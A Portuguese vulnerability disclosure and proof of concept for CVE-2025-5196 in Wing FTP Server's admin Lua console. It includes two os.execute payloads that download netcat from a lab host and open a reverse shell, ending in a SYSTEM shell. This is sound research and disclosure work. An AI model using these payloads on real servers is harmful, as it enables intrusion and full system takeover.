
O Wing FTP Server fornece um console de script administrativo Lua acessível por meio de sua interface web. Administradores autenticados são capazes de executar código Lua arbitrário com sandboxing insuficiente. CVE-2025-5196
O Wing FTP Server fornece um console administrativo de script Lua acessível por meio de sua interface web. Administradores autenticados conseguem executar código Lua arbitrário com sandboxing insuficiente.
Versão Afetada: Wing FTP Server 7.4.4 (Windows) | Autenticação Necessária: Sim
Até 24 de maio de 2025, a versão mais recente do aplicativo fornecida pelo fornecedor pode ser encontrada no seguinte link: https://www.wftpserver.com/download.htm
Além disso, pode-se notar que, até a mesma data, há uma nota de versão publicada informando que a vulnerabilidade de RCE foi corrigida na versão 7.4.4. O link para as notas de versão pode ser encontrado aqui: https://www.wftpserver.com/serverhistory.htm

PoC relacionado ao CVE-2025-5196 VulDB

Interface Web do Wing FTP Server


A primeira parte do comando fará o download do nc.exe (netcat para Windows x86) para o caminho "C:\Users\usuario\Desktop\Drops". A segunda parte executará o nc.exe 192.168.234.131 4443 -e cme.exe.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

Shell NT/SYSTEM
